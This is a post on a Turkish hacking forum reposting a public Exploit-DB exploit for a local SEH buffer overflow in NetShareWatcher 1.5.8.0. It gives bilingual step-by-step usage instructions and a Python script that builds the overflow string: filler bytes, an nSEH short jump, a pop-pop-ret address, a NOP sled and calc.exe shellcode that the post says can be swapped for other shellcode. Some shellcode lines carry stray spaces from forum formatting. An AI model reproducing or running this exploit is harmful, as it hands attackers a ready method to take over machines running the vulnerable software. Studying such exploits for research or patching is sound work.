İPUCU

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...

Seçenekler

NetShareWatcher 1.5.8.0 - Local SEH Buffer Overflow

21-03-2019 02:52
#1
deargod - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2019
Nereden:
vice city
Mesajlar:
167
Teşekkür (Etti):
20
Teşekkür (Aldı):
36
Konular:
15
Ticaret:
(0) %
# Exploit Title/Exploit Başlığı: NetShareWatcher 1.5.8.0 - SEH Buffer Overflow
# Date/Tarih: 2019-03-19
# Vendor Homepage/Yapımcı Adresi: Monitoring Remote Network Computers Shared Folders Permissions
# Software Link/Yazılım Linki: http://netsharewatcher.nsauditor.com...cher_setup.exe
# Exploit Author/Exploit Y azarı: Peyman Forouzan
# Tested Version/Versiyon: 1.5.8.0
# Tested on/Test Edilen Platform: Windows XP SP2 - SP3

# Software Description/Yazılım Açıklaması: NetShareWatcher , ağ yöneticileri için yazılmış olan ve ağ yöneticilerinin hangi bilgisayarın hangi izinlere sahip olduğunu ve aralarında dosya paylaşımı vb. işlemleri gerçekleştirebilmesini değiştirebilen bir programdır.

# 1- Run python code/Pyton kodunu çalıştırın : NetShareWatcher.py
# 2- Open Exploit.txt and copy content to clipboard/exploit.txt dosyasını aç ve içindeki yazıyı panoya kopyala
# 3- Open NetShareWatcher /NetShareWatcher uygulamasını aç
# 4- Setting --> Defaults --> Restrictions --> Add --> Custome (şu yolları takip edin)
# 5- Paste the content of Exploit.txt into the box /Kopyaladığınız metini kutunun içine yapıştırın
# 6- Click 'Find' /Find tuşuna tıklayın
# 7- Calc.exe Open ( Can be replaced with Shellcode ) /calc.exe açın (shellcode ile değiştirilebilir)


Alıntı:
#!/usr/bin/python

buffer = "\x41" * 262
nseh = "\xeb\x14\x90\x90" # Overwrite Next Seh With Short jmp
seh = "\x90\xBF\xC9\x74" # Overwrite Seh / pop esi pop ebx retn [OLEACC.dll]
nops = "\x90" * 20

# Calc.exe payload [size 227]
buf =""
buf += "\xdb\xcf\xb8\x27\x17\x16\x1f\xd9\x74\x24\xf4\x5f\ x2b\xc9"
buf += "\xb1\x33\x31\x47\x17\x83\xef\xfc\x03\x60\x04\xf4\ xea\x92"
buf += "\xc2\x71\x14\x6a\x13\xe2\x9c\x8f\x22\x30\xfa\xc4\ x17\x84"
buf += "\x88\x88\x9b\x6f\xdc\x38\x2f\x1d\xc9\x4f\x98\xa8\ x2f\x7e"
buf += "\x19\x1d\xf0\x2c\xd9\x3f\x8c\x2e\x0e\xe0\xad\xe1\ x43\xe1"
buf += "\xea\x1f\xab\xb3\xa3\x54\x1e\x24\xc7\x28\xa3\x45\ x07\x27"
buf += "\x9b\x3d\x22\xf7\x68\xf4\x2d\x27\xc0\x83\x66\xdf\ x6a\xcb"
buf += "\x56\xde\xbf\x0f\xaa\xa9\xb4\xe4\x58\x28\x1d\x35\ xa0\x1b"
buf += "\x61\x9a\x9f\x94\x6c\xe2\xd8\x12\x8f\x91\x12\x61\ x32\xa2"
buf += "\xe0\x18\xe8\x27\xf5\xba\x7b\x9f\xdd\x3b\xaf\x46\ x95\x37"
buf += "\x04\x0c\xf1\x5b\x9b\xc1\x89\x67\x10\xe4\x5d\xee\ x62\xc3"
buf += "\x79\xab\x31\x6a\xdb\x11\x97\x93\x3b\xfd\x48\x36\ x37\xef"
buf += "\x9d\x40\x1a\x65\x63\xc0\x20\xc0\x63\xda\x2a\x62\ x0c\xeb"
buf += "\xa1\xed\x4b\xf4\x63\x4a\xa3\xbe\x2e\xfa\x2c\x67\ xbb\xbf"
buf += "\x30\x98\x11\x83\x4c\x1b\x90\x7b\xab\x03\xd1\x7e\ xf7\x83"
buf += "\x09\xf2\x68\x66\x2e\xa1\x89\xa3\x4d\x24\x1a\x2f\ xbc\xc3"
buf += "\x9a\xca\xc0";

payload = buffer + nseh + seh + nops + buf
try:
f=open("Exploit.txt","w")
print "[+] Creating %s bytes payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File can't be created"
# Exploit Adresi : https://www.exploit-db.com/exploits/46578
Kullanıcı İmzası
"Ulusal egemenlik öyle bir nurdur ki, onun karşısında zincirler erir, taç ve tahtlar yanar, mahvolur."
Mustafa Kemal ATATÜRK

telegram: deargod_tht
Konu deargod tarafından (21-03-2019 02:57 Saat 02:57 ) değiştirilmiştir.
LLegenDD Teşekkür etti.


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı